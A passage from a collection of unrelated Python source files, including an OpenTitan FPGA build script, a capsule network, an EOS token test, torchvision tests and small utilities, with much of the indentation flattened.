'lowrisc_dv_pins_if_0/pins_if.sv',
'lowrisc_prim_generic_clock_gating_0/rtl/prim_generic_clock_gating.sv',
'lowrisc_prim_generic_clock_mux2_0/rtl/prim_generic_clock_mux2.sv',
'lowrisc_prim_generic_flash_0/rtl/prim_generic_flash.sv',
'lowrisc_prim_generic_pad_wrapper_0/rtl/prim_generic_pad_wrapper.sv',
'lowrisc_prim_generic_ram_1p_0/rtl/prim_generic_ram_1p.sv',
'lowrisc_prim_generic_ram_2p_0/rtl/prim_generic_ram_2p.sv',
'lowrisc_prim_prim_pkg_0.1/rtl/prim_pkg.sv',
'lowrisc_prim_xilinx_clock_gating_0/rtl/prim_xilinx_clock_gating.sv',
'lowrisc_prim_xilinx_clock_mux2_0/rtl/prim_xilinx_clock_mux2.sv',
'lowrisc_prim_xilinx_pad_wrapper_0/rtl/prim_xilinx_pad_wrapper.sv',
'lowrisc_prim_xilinx_ram_2p_0/rtl/prim_xilinx_ram_2p.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_pkg.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_alu.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_compressed_decoder.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_controller.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_cs_registers.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_decoder.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_ex_block.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_fetch_fifo.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_id_stage.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_if_stage.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_load_store_unit.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_multdiv_fast.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_multdiv_slow.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_prefetch_buffer.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_pmp.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_register_file_ff.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_core.sv',
'lowrisc_ip_flash_ctrl_pkg_0.1/rtl/flash_ctrl_pkg.sv',
'lowrisc_prim_clock_gating_0/abstract/prim_clock_gating.sv',
'lowrisc_prim_clock_mux2_0/abstract/prim_clock_mux2.sv',
'lowrisc_prim_diff_decode_0/rtl/prim_diff_decode.sv',
'lowrisc_prim_pad_wrapper_0/abstract/prim_pad_wrapper.sv',
'lowrisc_prim_ram_1p_0/abstract/prim_ram_1p.sv',
'lowrisc_prim_ram_2p_0/abstract/prim_ram_2p.sv',
'lowrisc_tlul_headers_0.1/rtl/tlul_pkg.sv',
'lowrisc_prim_all_0.1/rtl/prim_clock_inverter.sv',
'lowrisc_prim_all_0.1/rtl/prim_alert_receiver.sv',
'lowrisc_prim_all_0.1/rtl/prim_alert_sender.sv',
'lowrisc_prim_all_0.1/rtl/prim_arbiter_ppc.sv',
'lowrisc_prim_all_0.1/rtl/prim_arbiter_tree.sv',
'lowrisc_prim_all_0.1/rtl/prim_esc_receiver.sv',
'lowrisc_prim_all_0.1/rtl/prim_esc_sender.sv',
'lowrisc_prim_all_0.1/rtl/prim_sram_arbiter.sv',
'lowrisc_prim_all_0.1/rtl/prim_fifo_async.sv',
'lowrisc_prim_all_0.1/rtl/prim_fifo_sync.sv',
'lowrisc_prim_all_0.1/rtl/prim_flop_2sync.sv',
'lowrisc_prim_all_0.1/rtl/prim_lfsr.sv',
'lowrisc_prim_all_0.1/rtl/prim_packer.sv',
'lowrisc_prim_all_0.1/rtl/prim_pulse_sync.sv',
'lowrisc_prim_all_0.1/rtl/prim_filter.sv',
'lowrisc_prim_all_0.1/rtl/prim_filter_ctr.sv',
'lowrisc_prim_all_0.1/rtl/prim_subreg.sv',
'lowrisc_prim_all_0.1/rtl/prim_subreg_ext.sv',
'lowrisc_prim_all_0.1/rtl/prim_intr_hw.sv',
'lowrisc_prim_all_0.1/rtl/prim_secded_39_32_enc.sv',
'lowrisc_prim_all_0.1/rtl/prim_secded_39_32_dec.sv',
'lowrisc_prim_all_0.1/rtl/prim_ram_2p_adv.sv',
'lowrisc_prim_all_0.1/rtl/prim_ram_2p_async_adv.sv',
'lowrisc_prim_flash_0/abstract/prim_flash.sv',
'lowrisc_top_earlgrey_alert_handler_reg_0.1/rtl/autogen/alert_handler_reg_pkg.sv',
'lowrisc_top_earlgrey_alert_handler_reg_0.1/rtl/autogen/alert_handler_reg_top.sv',
'lowrisc_top_earlgrey_pinmux_reg_0.1/rtl/autogen/pinmux_reg_pkg.sv',
'lowrisc_top_earlgrey_pinmux_reg_0.1/rtl/autogen/pinmux_reg_top.sv',
'lowrisc_ip_usb_fs_nb_pe_0.1/rtl/usb_consts_pkg.sv',
'lowrisc_ip_usb_fs_nb_pe_0.1/rtl/usb_fs_nb_in_pe.sv',
'lowrisc_ip_usb_fs_nb_pe_0.1/rtl/usb_fs_nb_out_pe.sv',
'lowrisc_ip_usb_fs_nb_pe_0.1/rtl/usb_fs_nb_pe.sv',
'lowrisc_ip_usb_fs_nb_pe_0.1/rtl/usb_fs_rx.sv',
'lowrisc_ip_usb_fs_nb_pe_0.1/rtl/usb_fs_tx.sv',
'lowrisc_ip_usb_fs_nb_pe_0.1/rtl/usb_fs_tx_mux.sv',
'lowrisc_prim_generic_rom_0/rtl/prim_generic_rom.sv',
'lowrisc_prim_xilinx_rom_0/rtl/prim_xilinx_rom.sv',
'lowrisc_tlul_common_0.1/rtl/tlul_fifo_sync.sv',
'lowrisc_tlul_common_0.1/rtl/tlul_fifo_async.sv',
'lowrisc_tlul_common_0.1/rtl/tlul_assert.sv',
'lowrisc_tlul_common_0.1/rtl/tlul_err.sv',
'lowrisc_tlul_common_0.1/rtl/tlul_assert_multiple.sv',
'pulp-platform_riscv-dbg_0.1_0/pulp_riscv_dbg/debug_rom/debug_rom.sv',
'pulp-platform_riscv-dbg_0.1_0/pulp_riscv_dbg/src/dm_pkg.sv',
'pulp-platform_riscv-dbg_0.1_0/pulp_riscv_dbg/src/dm_sba.sv',
'pulp-platform_riscv-dbg_0.1_0/pulp_riscv_dbg/src/dm_csrs.sv',
'pulp-platform_riscv-dbg_0.1_0/pulp_riscv_dbg/src/dm_mem.sv',
'pulp-platform_riscv-dbg_0.1_0/pulp_riscv_dbg/src/dmi_cdc.sv',
'pulp-platform_riscv-dbg_0.1_0/pulp_riscv_dbg/src/dmi_jtag.sv',
'pulp-platform_riscv-dbg_0.1_0/pulp_riscv_dbg/src/dmi_jtag_tap.sv',
'lowrisc_prim_rom_0/abstract/prim_rom.sv',
'lowrisc_tlul_adapter_reg_0.1/rtl/tlul_adapter_reg.sv',
'lowrisc_tlul_adapter_sram_0.1/rtl/tlul_adapter_sram.sv',
'lowrisc_tlul_socket_1n_0.1/rtl/tlul_err_resp.sv',
'lowrisc_tlul_socket_1n_0.1/rtl/tlul_socket_1n.sv',
'lowrisc_tlul_socket_m1_0.1/rtl/tlul_socket_m1.sv',
'lowrisc_tlul_sram2tlul_0.1/rtl/sram2tlul.sv',
'lowrisc_ip_aes_0.5/rtl/aes_pkg.sv',
'lowrisc_ip_aes_0.5/rtl/aes_reg_pkg.sv',
'lowrisc_ip_aes_0.5/rtl/aes_reg_top.sv',
'lowrisc_ip_aes_0.5/rtl/aes_core.sv',
'lowrisc_ip_aes_0.5/rtl/aes_control.sv',
'lowrisc_ip_aes_0.5/rtl/aes_cipher_core.sv',
'lowrisc_ip_aes_0.5/rtl/aes_cipher_control.sv',
'lowrisc_ip_aes_0.5/rtl/aes_sub_bytes.sv',
'lowrisc_ip_aes_0.5/rtl/aes_sbox.sv',
'lowrisc_ip_aes_0.5/rtl/aes_sbox_lut.sv',
'lowrisc_ip_aes_0.5/rtl/aes_sbox_canright.sv',
'lowrisc_ip_aes_0.5/rtl/aes_shift_rows.sv',
'lowrisc_ip_aes_0.5/rtl/aes_mix_columns.sv',
'lowrisc_ip_aes_0.5/rtl/aes_mix_single_column.sv',
'lowrisc_ip_aes_0.5/rtl/aes_key_expand.sv',
'lowrisc_ip_aes_0.5/rtl/aes.sv',
'lowrisc_ip_alert_handler_component_0.1/rtl/alert_pkg.sv',
'lowrisc_ip_alert_handler_component_0.1/rtl/alert_handler_reg_wrap.sv',
'lowrisc_ip_alert_handler_component_0.1/rtl/alert_handler_class.sv',
'lowrisc_ip_alert_handler_component_0.1/rtl/alert_handler_ping_timer.sv',
'lowrisc_ip_alert_handler_component_0.1/rtl/alert_handler_esc_timer.sv',
'lowrisc_ip_alert_handler_component_0.1/rtl/alert_handler_accu.sv',
'lowrisc_ip_alert_handler_component_0.1/rtl/alert_handler.sv',
'lowrisc_ip_flash_ctrl_0.1/rtl/flash_ctrl_reg_pkg.sv',
'lowrisc_ip_flash_ctrl_0.1/rtl/flash_ctrl_reg_top.sv',
'lowrisc_ip_flash_ctrl_0.1/rtl/flash_ctrl.sv',
'lowrisc_ip_flash_ctrl_0.1/rtl/flash_erase_ctrl.sv',
'lowrisc_ip_flash_ctrl_0.1/rtl/flash_prog_ctrl.sv',
'lowrisc_ip_flash_ctrl_0.1/rtl/flash_rd_ctrl.sv',
'lowrisc_ip_flash_ctrl_0.1/rtl/flash_mp.sv',
'lowrisc_ip_flash_ctrl_0.1/rtl/flash_phy.sv',
'lowrisc_ip_gpio_0.1/rtl/gpio_reg_pkg.sv',
'lowrisc_ip_gpio_0.1/rtl/gpio.sv',
'lowrisc_ip_gpio_0.1/rtl/gpio_reg_top.sv',
'lowrisc_ip_hmac_0.1/rtl/hmac_pkg.sv',
'lowrisc_ip_hmac_0.1/rtl/sha2.sv',
'lowrisc_ip_hmac_0.1/rtl/sha2_pad.sv',
'lowrisc_ip_hmac_0.1/rtl/hmac_reg_pkg.sv',
'lowrisc_ip_hmac_0.1/rtl/hmac_reg_top.sv',
'lowrisc_ip_hmac_0.1/rtl/hmac_core.sv',
'lowrisc_ip_hmac_0.1/rtl/hmac.sv',
'lowrisc_ip_nmi_gen_0.1/rtl/nmi_gen_reg_pkg.sv',
'lowrisc_ip_nmi_gen_0.1/rtl/nmi_gen_reg_top.sv',
'lowrisc_ip_nmi_gen_0.1/rtl/nmi_gen.sv',
'lowrisc_ip_pinmux_component_0.1/rtl/pinmux.sv',
'lowrisc_ip_rv_core_ibex_0.1/rtl/rv_core_ibex.sv',
'lowrisc_ip_rv_dm_0.1/rtl/rv_dm.sv',
'lowrisc_ip_rv_dm_0.1/rtl/tlul_adapter_host.sv',
'lowrisc_ip_rv_plic_component_0.1/rtl/rv_plic_gateway.sv',
'lowrisc_ip_rv_plic_component_0.1/rtl/rv_plic_target.sv',
'lowrisc_ip_rv_timer_0.1/rtl/rv_timer_reg_pkg.sv',
'lowrisc_ip_rv_timer_0.1/rtl/rv_timer_reg_top.sv',
'lowrisc_ip_rv_timer_0.1/rtl/timer_core.sv',
'lowrisc_ip_rv_timer_0.1/rtl/rv_timer.sv',
'lowrisc_ip_spi_device_0.1/rtl/spi_device_reg_pkg.sv',
'lowrisc_ip_spi_device_0.1/rtl/spi_device_reg_top.sv',
'lowrisc_ip_spi_device_0.1/rtl/spi_device_pkg.sv',
'lowrisc_ip_spi_device_0.1/rtl/spi_fwm_rxf_ctrl.sv',
'lowrisc_ip_spi_device_0.1/rtl/spi_fwm_txf_ctrl.sv',
'lowrisc_ip_spi_device_0.1/rtl/spi_fwmode.sv',
'lowrisc_ip_spi_device_0.1/rtl/spi_device.sv',
'lowrisc_ip_uart_0.1/rtl/uart_reg_pkg.sv',
'lowrisc_ip_uart_0.1/rtl/uart_reg_top.sv',
'lowrisc_ip_uart_0.1/rtl/uart_rx.sv',
'lowrisc_ip_uart_0.1/rtl/uart_tx.sv',
'lowrisc_ip_uart_0.1/rtl/uart_core.sv',
'lowrisc_ip_uart_0.1/rtl/uart.sv',
'lowrisc_ip_usbdev_0.1/rtl/usbdev_reg_pkg.sv',
'lowrisc_ip_usbdev_0.1/rtl/usbdev_reg_top.sv',
'lowrisc_ip_usbdev_0.1/rtl/usbdev_usbif.sv',
'lowrisc_ip_usbdev_0.1/rtl/usbdev_flop_2syncpulse.sv',
'lowrisc_ip_usbdev_0.1/rtl/usbdev_linkstate.sv',
'lowrisc_ip_usbdev_0.1/rtl/usbdev_iomux.sv',
'lowrisc_ip_usbdev_0.1/rtl/usbdev.sv',
'lowrisc_ip_xbar_main_0.1/tl_main_pkg.sv',
'lowrisc_ip_xbar_main_0.1/xbar_main.sv',
'lowrisc_ip_xbar_peri_0.1/tl_peri_pkg.sv',
'lowrisc_ip_xbar_peri_0.1/xbar_peri.sv',
'lowrisc_top_earlgrey_rv_plic_0.1/rtl/autogen/rv_plic_reg_pkg.sv',
'lowrisc_top_earlgrey_rv_plic_0.1/rtl/autogen/rv_plic_reg_top.sv',
'lowrisc_top_earlgrey_rv_plic_0.1/rtl/autogen/rv_plic.sv',
'lowrisc_systems_top_earlgrey_0.1/rtl/padctl.sv',
'lowrisc_systems_top_earlgrey_0.1/rtl/autogen/top_earlgrey.sv',
'lowrisc_systems_top_earlgrey_zcu104_0.1/rtl/clkgen_xilusp.sv',
'lowrisc_systems_top_earlgrey_zcu104_0.1/rtl/top_earlgrey_zcu104.sv',
]
with open(post_imp_file, 'w') as f:
f.write('write_checkpoint -force design.dcp')
files = [
    {
        'name': os.path.realpath(
            'lowrisc_systems_top_earlgrey_zcu104_0.1/data/pins_zcu104.xdc'),
        'file_type': 'xdc'
    },
    {
        'name': os.path.realpath('lowrisc_prim_assert_0.1/rtl/prim_assert.sv'),
        'file_type': 'systemVerilogSource',
        'is_include_file': 'true'
    },
]
parameters = {
'ROM_INIT_FILE': {
'datatype': 'str',
'paramtype': 'vlogdefine'
},
'PRIM_DEFAULT_IMPL': {
'datatype': 'str',
'paramtype': 'vlogdefine'
},
}
for src in srcs:
files.append({
'name': os.path.realpath(src),
'file_type': 'systemVerilogSource'
})
tool = 'vivado'
incdirs = [os.path.realpath('lowrisc_prim_assert_0.1/rtl')]
edam = {
'files': files,
'name': 'design',
'toplevel': 'top_earlgrey_zcu104',
'parameters': parameters,
'tool_options': {
'vivado': {
'part': os.environ['URAY_PART'],
'post_imp': post_imp_file,
'synth': synth_tool
}
}
}
backend = edalize.get_edatool(tool)(edam=edam, work_root=work_root)
args = [
'--ROM_INIT_FILE={}'.format(
os.path.realpath('boot_rom_fpga_nexysvideo.vmem')),
'--PRIM_DEFAULT_IMPL=prim_pkg::ImplXilinx'
]
backend.configure(args)
backend.build()
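# Example invocation (hypothetical script name and part string): the Vivado part is read
# from the URAY_PART environment variable, and boot_rom_fpga_nexysvideo.vmem plus the
# fusesoc-style source tree listed in `srcs` must be present in the working directory, e.g.:
#   URAY_PART=xczu7ev-ffvc1156-2-e python3 build_top_earlgrey_zcu104.py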
|
from argparse import ArgumentParser
from src.dummy_manager import (
DummyGameOverManager, DummyMenuManager, DummyOverWorldManager,
DummyQuestionManager
)
from src.game import Game
from src.manager import GameManager
def main() -> None:
"""Run the game"""
parser = ArgumentParser()
parser.set_defaults(manager=GameManager)
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument('--menu', dest='manager', action='store_const', const=DummyMenuManager)
group.add_argument('--over_world', dest='manager', action='store_const', const=DummyOverWorldManager)
group.add_argument('--question', dest='manager', action='store_const', const=DummyQuestionManager)
group.add_argument('--game_over', dest='manager', action='store_const', const=DummyGameOverManager)
args = parser.parse_args()
game = Game(args.manager)
game.run()
if __name__ == '__main__':
main()
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
USE_CUDA = True if torch.cuda.is_available() else False
class ConvLayer(nn.Module):
def __init__(self, in_channels=1, out_channels=256, kernel_size=9):
super(ConvLayer, self).__init__()
self.conv = nn.Conv2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=1
)
def forward(self, x):
return F.relu(self.conv(x))
class PrimaryCaps(nn.Module):
def __init__(self, num_capsules=8, in_channels=256, out_channels=32, kernel_size=9, num_routes=32 * 6 * 6):
super(PrimaryCaps, self).__init__()
self.num_routes = num_routes
self.capsules = nn.ModuleList([
nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=2, padding=0)
for _ in range(num_capsules)])
def forward(self, x):
u = [capsule(x) for capsule in self.capsules]
u = torch.stack(u, dim=1)
u = u.view(x.size(0), self.num_routes, -1)
return self.squash(u)
    def squash(self, input_tensor):
        # v = (||s||^2 / (1 + ||s||^2)) * (s / ||s||), written here as
        # s * ||s||^2 / ((1 + ||s||^2) * ||s||)
        squared_norm = (input_tensor ** 2).sum(-1, keepdim=True)
        output_tensor = squared_norm * input_tensor / ((1. + squared_norm) * torch.sqrt(squared_norm))
        return output_tensor
class DigitCaps(nn.Module):
def __init__(self, num_capsules=10, num_routes=32 * 6 * 6, in_channels=8, out_channels=16):
super(DigitCaps, self).__init__()
self.in_channels = in_channels
self.num_routes = num_routes
self.num_capsules = num_capsules
self.W = nn.Parameter(torch.randn(1, num_routes, num_capsules, out_channels, in_channels))
def forward(self, x):
batch_size = x.size(0)
x = torch.stack([x] * self.num_capsules, dim=2).unsqueeze(4)
W = torch.cat([self.W] * batch_size, dim=0)
u_hat = torch.matmul(W, x)
b_ij = Variable(torch.zeros(1, self.num_routes, self.num_capsules, 1))
if USE_CUDA:
b_ij = b_ij.cuda()
num_iterations = 3
for iteration in range(num_iterations):
c_ij = F.softmax(b_ij, dim=1)
c_ij = torch.cat([c_ij] * batch_size, dim=0).unsqueeze(4)
s_j = (c_ij * u_hat).sum(dim=1, keepdim=True)
v_j = self.squash(s_j)
if iteration < num_iterations - 1:
a_ij = torch.matmul(u_hat.transpose(3, 4), torch.cat([v_j] * self.num_routes, dim=1))
b_ij = b_ij + a_ij.squeeze(4).mean(dim=0, keepdim=True)
return v_j.squeeze(1)
def squash(self, input_tensor):
squared_norm = (input_tensor ** 2).sum(-1, keepdim=True)
output_tensor = squared_norm * input_tensor / ((1. + squared_norm) * torch.sqrt(squared_norm))
return output_tensor
class Decoder(nn.Module):
def __init__(self, input_width=28, input_height=28, input_channel=1):
super(Decoder, self).__init__()
self.input_width = input_width
self.input_height = input_height
self.input_channel = input_channel
        self.reconstruction_layers = nn.Sequential(
nn.Linear(16 * 10, 512),
nn.ReLU(inplace=True),
nn.Linear(512, 1024),
nn.ReLU(inplace=True),
nn.Linear(1024, self.input_height * self.input_width * self.input_channel),
nn.Sigmoid()
)
def forward(self, x, data):
classes = torch.sqrt((x ** 2).sum(2))
classes = F.softmax(classes, dim=0)
_, max_length_indices = classes.max(dim=1)
masked = Variable(torch.sparse.torch.eye(10))
if USE_CUDA:
masked = masked.cuda()
masked = masked.index_select(dim=0, index=Variable(max_length_indices.squeeze(1).data))
t = (x * masked[:, :, None, None]).view(x.size(0), -1)
        reconstructions = self.reconstruction_layers(t)
reconstructions = reconstructions.view(-1, self.input_channel, self.input_width, self.input_height)
return reconstructions, masked
class CapsNet(nn.Module):
def __init__(self, config=None):
super(CapsNet, self).__init__()
if config:
self.conv_layer = ConvLayer(config.cnn_in_channels, config.cnn_out_channels, config.cnn_kernel_size)
self.primary_capsules = PrimaryCaps(config.pc_num_capsules, config.pc_in_channels, config.pc_out_channels,
config.pc_kernel_size, config.pc_num_routes)
self.digit_capsules = DigitCaps(config.dc_num_capsules, config.dc_num_routes, config.dc_in_channels,
config.dc_out_channels)
self.decoder = Decoder(config.input_width, config.input_height, config.cnn_in_channels)
else:
self.conv_layer = ConvLayer()
self.primary_capsules = PrimaryCaps()
self.digit_capsules = DigitCaps()
self.decoder = Decoder()
self.mse_loss = nn.MSELoss()
def forward(self, data):
output = self.digit_capsules(self.primary_capsules(self.conv_layer(data)))
reconstructions, masked = self.decoder(output, data)
return output, reconstructions, masked
def loss(self, data, x, target, reconstructions):
return self.margin_loss(x, target) + self.reconstruction_loss(data, reconstructions)
def margin_loss(self, x, labels, size_average=True):
batch_size = x.size(0)
v_c = torch.sqrt((x ** 2).sum(dim=2, keepdim=True))
left = F.relu(0.9 - v_c).view(batch_size, -1)
right = F.relu(v_c - 0.1).view(batch_size, -1)
loss = labels * left + 0.5 * (1.0 - labels) * right
loss = loss.sum(dim=1).mean()
return loss
def reconstruction_loss(self, data, reconstructions):
loss = self.mse_loss(reconstructions.view(reconstructions.size(0), -1), data.view(reconstructions.size(0), -1))
return loss * 0.0005
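# Shape-check sketch (added illustration; assumes the default MNIST-style 28x28
# single-channel configuration used by the no-config constructor above):
#   net = CapsNet()
#   caps, recon, masked = net(torch.randn(4, 1, 28, 28))
#   # caps:   (4, 10, 16, 1)  one 16-D capsule vector per digit class
#   # recon:  (4, 1, 28, 28)  decoder reconstructions
#   # masked: (4, 10)         one-hot rows for the predicted class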
|
import sys
from eosfactory.eosf import *
verbosity([Verbosity.INFO, Verbosity.OUT, Verbosity.DEBUG])
CONTRACT_WORKSPACE = sys.path[0] + "/../"
# Actors of the test:
MASTER = MasterAccount()
HOST = Account()
ALICE = Account()
BOB = Account()
CAROL = Account()
def test():
SCENARIO('''
Initialize the token and run a couple of transfers between different accounts.
''')
reset()
create_master_account("MASTER")
COMMENT('''
Build & deploy the contract:
''')
create_account("HOST", MASTER)
smart = Contract(HOST, CONTRACT_WORKSPACE)
smart.build(force=False)
smart.deploy()
COMMENT('''
Create test accounts:
''')
create_account("ALICE", MASTER)
create_account("BOB", MASTER)
create_account("CAROL", MASTER)
COMMENT('''
Initialize the token and send some tokens to one of the accounts:
''')
HOST.push_action(
"create",
{
"issuer": MASTER,
"maximum_supply": "1000000000.0000 EOS",
"can_freeze": "0",
"can_recall": "0",
"can_whitelist": "0"
},
permission=[(MASTER, Permission.OWNER), (HOST, Permission.ACTIVE)])
HOST.push_action(
"issue",
{
"to": ALICE, "quantity": "100.0000 EOS", "memo": ""
},
permission=(MASTER, Permission.ACTIVE))
COMMENT('''
Execute a series of transfers between the accounts:
''')
HOST.push_action(
"transfer",
{
"from": ALICE, "to": CAROL,
"quantity": "25.0000 EOS", "memo":""
},
permission=(ALICE, Permission.ACTIVE))
HOST.push_action(
"transfer",
{
"from": CAROL, "to": BOB,
"quantity": "11.0000 EOS", "memo": ""
},
permission=(CAROL, Permission.ACTIVE))
HOST.push_action(
"transfer",
{
"from": CAROL, "to": BOB,
"quantity": "2.0000 EOS", "memo": ""
},
permission=(CAROL, Permission.ACTIVE))
HOST.push_action(
"transfer",
{
"from": BOB, "to": ALICE,
"quantity": "2.0000 EOS", "memo":""
},
permission=(BOB, Permission.ACTIVE))
COMMENT('''
Verify the outcome:
''')
table_alice = HOST.table("accounts", ALICE)
table_bob = HOST.table("accounts", BOB)
table_carol = HOST.table("accounts", CAROL)
assert(table_alice.json["rows"][0]["balance"] == '77.0000 EOS')
assert(table_bob.json["rows"][0]["balance"] == '11.0000 EOS')
assert(table_carol.json["rows"][0]["balance"] == '12.0000 EOS')
stop()
if __name__ == "__main__":
test()
|
from .hashtag import Hashtag
from .hashtagstats_manager import HashtagStatsManager
|
import sys
from socket import *
from protocol import *
name=sys.argv[1]
lang=sys.argv[2]
email=sys.argv[3]
phone=sys.argv[4]
academic=sys.argv[5]
other=sys.argv[6]
auth=sys.argv[7]
d={'name':name,'lang':lang,'email':email,'phone':phone,'academic':academic,'other':other,'auth':auth}
for key in ['email','phone','academic','other']:
if(d[key]=='0'):
d.pop(key)
content={}
for i in d:
if(i!='auth' and i!='lang'):
content[i]=d[i]
serverName = '127.0.0.1'
serverPort = 12000
clientSocket = socket(AF_INET, SOCK_DGRAM)
request=Message(clientSocket,serverName,serverPort)
request.write_client(content,d['auth'],d['lang'])
request.read_client()
clientSocket.close()
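# Example invocation (hypothetical values), matching the positional argv order
# name, lang, email, phone, academic, other, auth; a literal '0' drops that optional field:
#   python client.py Alice en alice@example.com 0 bsc_cs 0 my_auth_token
# Here phone and other are omitted, so the request content carries name, email and academic.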
|
##
##
# File auto-generated against equivalent DynamicSerialize Java class
class CommitGridsRequest(object):
def __init__(self):
self.commits = None
self.workstationID = None
self.siteID = None
def getCommits(self):
return self.commits
def setCommits(self, commits):
self.commits = commits
def getWorkstationID(self):
return self.workstationID
def setWorkstationID(self, workstationID):
self.workstationID = workstationID
def getSiteID(self):
return self.siteID
def setSiteID(self, siteID):
self.siteID = siteID
|
import torch
from torchvision import transforms as T
from torchvision.transforms import functional as F
from PIL import Image
import numpy as np
import unittest
class Tester(unittest.TestCase):
def _create_data(self, height=3, width=3, channels=3):
tensor = torch.randint(0, 255, (channels, height, width), dtype=torch.uint8)
pil_img = Image.fromarray(tensor.permute(1, 2, 0).contiguous().numpy())
return tensor, pil_img
def compareTensorToPIL(self, tensor, pil_image):
pil_tensor = torch.as_tensor(np.array(pil_image).transpose((2, 0, 1)))
self.assertTrue(tensor.equal(pil_tensor))
def _test_flip(self, func, method):
tensor, pil_img = self._create_data()
flip_tensor = getattr(F, func)(tensor)
flip_pil_img = getattr(F, func)(pil_img)
self.compareTensorToPIL(flip_tensor, flip_pil_img)
scripted_fn = torch.jit.script(getattr(F, func))
flip_tensor_script = scripted_fn(tensor)
self.assertTrue(flip_tensor.equal(flip_tensor_script))
# test for class interface
f = getattr(T, method)()
scripted_fn = torch.jit.script(f)
scripted_fn(tensor)
def test_random_horizontal_flip(self):
self._test_flip('hflip', 'RandomHorizontalFlip')
def test_random_vertical_flip(self):
self._test_flip('vflip', 'RandomVerticalFlip')
def test_adjustments(self):
fns = ['adjust_brightness', 'adjust_contrast', 'adjust_saturation']
for _ in range(20):
factor = 3 * torch.rand(1).item()
tensor, _ = self._create_data()
pil_img = T.ToPILImage()(tensor)
for func in fns:
adjusted_tensor = getattr(F, func)(tensor, factor)
adjusted_pil_img = getattr(F, func)(pil_img, factor)
adjusted_pil_tensor = T.ToTensor()(adjusted_pil_img)
scripted_fn = torch.jit.script(getattr(F, func))
adjusted_tensor_script = scripted_fn(tensor, factor)
if not tensor.dtype.is_floating_point:
adjusted_tensor = adjusted_tensor.to(torch.float) / 255
adjusted_tensor_script = adjusted_tensor_script.to(torch.float) / 255
# F uses uint8 and F_t uses float, so there is a small
# difference in values caused by (at most 5) truncations.
max_diff = (adjusted_tensor - adjusted_pil_tensor).abs().max()
max_diff_scripted = (adjusted_tensor - adjusted_tensor_script).abs().max()
self.assertLess(max_diff, 5 / 255 + 1e-5)
self.assertLess(max_diff_scripted, 5 / 255 + 1e-5)
if __name__ == '__main__':
unittest.main()
|
"""
Given a binary tree, check whether it is a mirror of itself (ie, symmetric
around its center).
For example, this binary tree is symmetric:
    1
   / \
  2   2
 / \ / \
3  4 4  3
But the following is not:
    1
   / \
  2   2
   \   \
   3    3
Note:
Bonus points if you could solve it both recursively and iteratively.
"""
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def isNodeSymmetric(self,p,q):
if p is None and q is None:
return True
elif p is not None and q is not None and p.val==q.val:
return self.isNodeSymmetric(p.left,q.right) and self.isNodeSymmetric(p.right,q.left)
else:
return False
def isSymmetric(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
if root is None:
return True
else:
return self.isNodeSymmetric(root.left,root.right)
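# Iterative variant (added sketch covering the "bonus" noted in the problem statement):
# walk mirrored node pairs with an explicit stack instead of recursion.
class IterativeSolution(object):
    def isSymmetric(self, root):
        """
        :type root: TreeNode
        :rtype: bool
        """
        if root is None:
            return True
        stack = [(root.left, root.right)]
        while stack:
            p, q = stack.pop()
            if p is None and q is None:
                continue
            if p is None or q is None or p.val != q.val:
                return False
            # outer children must mirror each other, as must the inner children
            stack.append((p.left, q.right))
            stack.append((p.right, q.left))
        return True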
|
#!/usr/bin/env python
import os
import click
import torch
import numpy as np
def load_models(model_dir):
models = []
for path in os.listdir(model_dir):
if path.endswith(".pt"):
models.append(torch.jit.load(os.path.join(model_dir, path)))
return models
def parse_feature(aln_path):
AMINO = "ACDEFGHIKLMNPQRSTVWY-XBZUOJ"
msa = [line.strip() for line in open(aln_path) if not line.startswith(">")]
msa = [[AMINO.index(_) for _ in line if _ in AMINO] for line in msa]
msa = torch.tensor(msa).long()
msa[msa >= 21] = 20
return msa
def predict_single(models, aln_path, output_path):
feat = parse_feature(aln_path)
cbcb, omega, theta, phi = [], [], [], []
with torch.no_grad():
for model in models:
a, b, c, d = model(feat)
cbcb.append(a.cpu().numpy())
omega.append(b.cpu().numpy())
theta.append(c.cpu().numpy())
phi.append(d.cpu().numpy())
np.savez(
output_path,
cbcb=np.mean(cbcb, axis=0),
omega=np.mean(omega, axis=0),
theta=np.mean(theta, axis=0),
phi=np.mean(phi, axis=0),
)
@click.command()
@click.option("-m", "--model_dir", required=True, type=click.Path())
@click.option("-i", "--aln_path", required=True, type=click.Path())
@click.option("-o", "--output_path", required=True, type=click.Path())
def main(model_dir, aln_path, output_path):
"""
predict from a *.aln file
"""
models = load_models(model_dir)
predict_single(models, aln_path, output_path)
if __name__ == "__main__":
main()
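# Example invocation (hypothetical paths):
#   python predict.py -m models/ -i query.aln -o query.npz
# loads every TorchScript *.pt file under models/, averages their predictions, and
# stores the resulting cbcb/omega/theta/phi maps in query.npz.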
|
import numpy as np
from mcdm_method import MCDM_method
class SPOTIS(MCDM_method):
def __init__(self):
"""
Create SPOTIS method object.
"""
pass
def __call__(self, matrix, weights, types, bounds):
"""
Score alternatives provided in decision matrix `matrix` using criteria `weights` and criteria `types`.
Parameters
----------
matrix : ndarray
Decision matrix with m alternatives in rows and n criteria in columns.
weights: ndarray
Criteria weights. Sum of weights must be equal to 1.
types: ndarray
